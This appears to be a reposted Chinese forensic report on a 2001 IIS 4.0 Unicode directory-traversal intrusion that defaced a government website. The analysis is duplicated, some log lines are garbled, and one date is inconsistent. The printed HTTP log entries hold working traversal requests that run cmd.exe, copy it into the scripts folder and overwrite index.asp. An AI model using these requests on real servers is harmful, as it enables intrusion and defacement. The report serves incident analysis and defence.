如何防止黑客入侵
来源:百度文库 编辑:神马文学网 时间:2024/04/29 14:42:32
我是安络公司的安全工程师。最近美国黑客因撞机事件对我国一些政府网发动攻击,来势凶猛,我公司安全紧急响应中心已经接到7、8个这样的案例。
根据我们对这些案例的入侵过程分析,发现美国黑客并没有采用非常高明的手段,而大多是选择弱者,找那些安全防护措施做得很少的网站进行攻击,其中用到了几个危害很大的安全漏洞,下面的一个例子在我国很多网站上都很常见。希望贵网通过互联网媒体的形式,将类似这样的入侵案例批露出来,引起大家的警觉,并采取实际措施加以防护。希望互联网媒体不仅仅热中于报道攻击事件,也将一些重点放到安全防护上来,这样既有新闻价值,又能对读者提供帮助。谢谢!
关于http://www.xxxx.xxx.cn的入侵分析/
一:事件背景
广东某市C局所属网站http://www.xxx.com.cn/ (IP: 61.xxx.xxx.17)于2001年4月期间遭到黑客恶意攻击,造成网站网页被修改。在此情况下,深圳市安络科技有限公司于2001年4月17日受某市S局的委托,前往机房现场取证。
二:服务器基本情况以及已获取资料该服务器操作系统为Windows Nt Server 4.0,安装有IIS 4.0 ,对外使用FIREWALL屏蔽,只开放WEB服务。我方技术员收集获得MS IIS 4.0 2001年4月13日至 4月17日HTTPLOG 和FTPLOG。
三:分析
由于该站受入侵后的直接现象为网页被修改. 并且该站受到PIX FIREWALL防卫,对外只开放80端口,所以初步估计是通过IIS远程漏洞获得系统控制权的,IIS 4.0默认下存在ism.dll,msadcs.dll,unicode等获得网页修改权限的远程漏洞。于是我公司技术人员对该服务器的MS IIS 4.0 2001年8月17日至 4月17日HTTPLOG日志文件进行详细的分析和过滤,得出以下结论:
入侵者利用unicode漏洞,从而可以使用web端口提交执行命令的请求,修改网站主页。
注:漏洞详细信息请见: http://www.cnns.net/article/db/822.htm
以下为入侵者的入侵行为记录:
其中①:入侵者IP ② :日期 ③:时间 ④:使用方法 ⑤:被访问URL
⑥服务器返回号
如果⑥服务器返回号为200则入侵者成功利用unicode漏洞执行了命令。
① ② ③ ④ ⑤ ⑥
152.158.208.65 01-4-17 4:34:19 GET /scripts/..鼆????./winnt/system32/cmd.exe, /c+dir+c: 500
152.158.208.65 01-4-17 4:34:19 GET /scripts/..?../winnt/system32/cmd.exe, /c+dir+c: 500
152.158.208.65 01-4-17 4:34:19 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:19 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:19 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:21 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:21 GET /_vti_bin/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:23 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:23 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:23 GET /scripts/..饊??./winnt/system32/cmd.exe, /c+dir+c: 500
152.158.208.65 01-4-17 4:34:23 GET /msadc/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:25 GET /scripts/..o../winnt/system32/cmd.exe, /c+dir+c: 404
152.158.208.65 01-4-17 4:34:25 GET /scripts/..?../..?../mssql7/install/pubtext.bat"+&+dir+c: 403
152.158.208.65 01-4-17 4:34:25 GET /scripts/..鴢???./winnt/system32/cmd.exe, /c+dir+c: 500
152.158.208.65 01-4-17 4:34:25 GET /鄝?./winnt/system32/cmd.exe, /c+dir+c: 404
152.158.208.65 01-4-17 5:21:17 GET /scripts/..../winnt/system32/cmd.exe, /c+set 502
152.158.208.65 01-4-17 5:21:37 GET /scripts/..../winnt/system32/cmd.exe,
/c+copy+c:winntsystem32cmd.exe+c:Inetpubscripts1.exe 502
152.158.208.65 01-4-17 5:24:32 GET /scripts/..../Inetpub/scripts/1.exe, /c+dir+c: 200
152.158.208.65 01-4-17 5:24:38 GET /scripts/..../Inetpub/scripts/1.exe, /c+set 502
152.158.208.65 01-4-17 5:24:49 GET /scripts/..../Inetpub/scripts/1.exe,
/c+dir+C:InetPubwwwrootfastinfo 200
152.158.208.65 01-4-17 5:25:10 GET /scripts/..../Inetpub/scripts/1.exe,
/c+echo+rty>C:InetPubwwwrootfastinfoindex.asp 502
152.158.208.65 01-4-17 5:25:19 GET /index.asp 200
152.158.208.65 01-4-17 5:25:37 GET /scripts/..../Inetpub/scripts/1.exe, 502
/c+echo+^^^join+us:+poizonb0x@linuxmail.org^^^^^^^^^^^^^^^^^^^^^^[SecurityNewsPortal.com]^^^^^^^^^>
C:InetPubwwwrootfastinf
oindex.asp 502
152.158.208.65 01-4-17 5:25:43 GET /index.asp 200
从以上分析我们可以清楚的看到在2001年4月17日来自同一IP的入侵者试图使用unicode漏洞远程执行命令,达到修改网页的目的。 攻击时间为: 2001年4月17日4:34:19-2001年4月17日5:25:43
入侵者IP地址为: 152.158.208.65 来自于美国
四:结论
入侵者是利用Unicode远程漏洞获得系统控制权,多次远程执行命令,了解服务器结构后,修改网站主页。
锁定IP为: 152.158.208.65 来自于美国
攻击时间为: 2001年4月17日4:34:19-2001年4月17日5:25:43
根据我们对这些案例的入侵过程分析,发现美国黑客并没有采用非常高明的手段,而大多是选择弱者,找那些安全防护措施做得很少的网站进行攻击,其中用到了几个危害很大的安全漏洞,下面的一个例子在我国很多网站上都很常见。希望贵网通过互联网媒体的形式,将类似这样的入侵案例批露出来,引起大家的警觉,并采取实际措施加以防护。希望互联网媒体不仅仅热中于报道攻击事件,也将一些重点放到安全防护上来,这样既有新闻价值,又能对读者提供帮助。谢谢!
关于http://www.xxxx.xxx.cn的入侵分析/
一:事件背景
广东某市C局所属网站http://www.xxx.com.cn/ (IP: 61.xxx.xxx.17)于2001年4月期间遭到黑客恶意攻击,造成网站网页被修改。在此情况下,深圳市安络科技有限公司于2001年4月17日受某市S局的委托,前往机房现场取证。
二:服务器基本情况以及已获取资料该服务器操作系统为Windows Nt Server 4.0,安装有IIS 4.0 ,对外使用FIREWALL屏蔽,只开放WEB服务。我方技术员收集获得MS IIS 4.0 2001年4月13日至 4月17日HTTPLOG 和FTPLOG。
三:分析
由于该站受入侵后的直接现象为网页被修改. 并且该站受到PIX FIREWALL防卫,对外只开放80端口,所以初步估计是通过IIS远程漏洞获得系统控制权的,IIS 4.0默认下存在ism.dll,msadcs.dll,unicode等获得网页修改权限的远程漏洞。于是我公司技术人员对该服务器的MS IIS 4.0 2001年8月17日至 4月17日HTTPLOG日志文件进行详细的分析和过滤,得出以下结论:
入侵者利用unicode漏洞,从而可以使用web端口提交执行命令的请求,修改网站主页。
注:漏洞详细信息请见: http://www.cnns.net/article/db/822.htm
以下为入侵者的入侵行为记录:
其中①:入侵者IP ② :日期 ③:时间 ④:使用方法 ⑤:被访问URL
⑥服务器返回号
如果⑥服务器返回号为200则入侵者成功利用unicode漏洞执行了命令。
① ② ③ ④ ⑤ ⑥
152.158.208.65 01-4-17 4:34:19 GET /scripts/..鼆????./winnt/system32/cmd.exe, /c+dir+c: 500
152.158.208.65 01-4-17 4:34:19 GET /scripts/..?../winnt/system32/cmd.exe, /c+dir+c: 500
152.158.208.65 01-4-17 4:34:19 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:19 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:19 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:21 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:21 GET /_vti_bin/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:23 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:23 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:23 GET /scripts/..饊??./winnt/system32/cmd.exe, /c+dir+c: 500
152.158.208.65 01-4-17 4:34:23 GET /msadc/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200
152.158.208.65 01-4-17 4:34:25 GET /scripts/..o../winnt/system32/cmd.exe, /c+dir+c: 404
152.158.208.65 01-4-17 4:34:25 GET /scripts/..?../..?../mssql7/install/pubtext.bat"+&+dir+c: 403
152.158.208.65 01-4-17 4:34:25 GET /scripts/..鴢???./winnt/system32/cmd.exe, /c+dir+c: 500
152.158.208.65 01-4-17 4:34:25 GET /鄝?./winnt/system32/cmd.exe, /c+dir+c: 404
152.158.208.65 01-4-17 5:21:17 GET /scripts/..../winnt/system32/cmd.exe, /c+set 502
152.158.208.65 01-4-17 5:21:37 GET /scripts/..../winnt/system32/cmd.exe,
/c+copy+c:winntsystem32cmd.exe+c:Inetpubscripts1.exe 502
152.158.208.65 01-4-17 5:24:32 GET /scripts/..../Inetpub/scripts/1.exe, /c+dir+c: 200
152.158.208.65 01-4-17 5:24:38 GET /scripts/..../Inetpub/scripts/1.exe, /c+set 502
152.158.208.65 01-4-17 5:24:49 GET /scripts/..../Inetpub/scripts/1.exe,
/c+dir+C:InetPubwwwrootfastinfo 200
152.158.208.65 01-4-17 5:25:10 GET /scripts/..../Inetpub/scripts/1.exe,
/c+echo+rty>C:InetPubwwwrootfastinfoindex.asp 502
152.158.208.65 01-4-17 5:25:19 GET /index.asp 200
152.158.208.65 01-4-17 5:25:37 GET /scripts/..../Inetpub/scripts/1.exe, 502
/c+echo+^^^join+us:+poizonb0x@linuxmail.org^^^^^^^^^^^^^^^^^^^^^^[SecurityNewsPortal.com]^^^^^^^^^>
C:InetPubwwwrootfastinf
oindex.asp 502
152.158.208.65 01-4-17 5:25:43 GET /index.asp 200
从以上分析我们可以清楚的看到在2001年4月17日来自同一IP的入侵者试图使用unicode漏洞远程执行命令,达到修改网页的目的。 攻击时间为: 2001年4月17日4:34:19-2001年4月17日5:25:43
入侵者IP地址为: 152.158.208.65 来自于美国
四:结论
入侵者是利用Unicode远程漏洞获得系统控制权,多次远程执行命令,了解服务器结构后,修改网站主页。
锁定IP为: 152.158.208.65 来自于美国
攻击时间为: 2001年4月17日4:34:19-2001年4月17日5:25:43
如何防止黑客入侵
路由器配置技巧防止网络黑客入侵
路由器配置技巧防止网络黑客入侵
引用 如何防止电脑被黑客入侵 - 成靖的日志 - 网易博客
如何防止135端口入侵
14招安全设置防止黑客攻击入侵
14招安全设置防止黑客攻击入侵-
关闭硬盘Autorun防止黑客入侵(转)
知己知彼 看黑客如何入侵Linux操作系统
黑客是如何入侵网吧的
知己知彼 看黑客如何入侵Linux操作系统
防止黑客入侵最高招:关闭系统端口--21互联远程教育网
ADSL拨号上网用户应该如何预防黑客入侵
黑客入侵计中计
防黑客入侵
防止ADSL被入侵
安全知识:14招windows安全设置防止黑客攻击入侵--瑞星反病毒资讯网 [信息安全 源...
如何看待当年孙立人将军活埋1200日本军人_一失足成千古恨 黑客入侵技术交流 黑客工具包下...
黑客入侵常用招数解析
黑客肉鸡防止七大高招
如何防止淘宝账号被盗 - 知识精华区 - 病毒、黑客与安全技术 - 电脑报官方论坛 - 数...
黑客入侵《地狱之门》路线图
黑客入侵个人电脑的4条途径
日本松下电器中文网站遭黑客入侵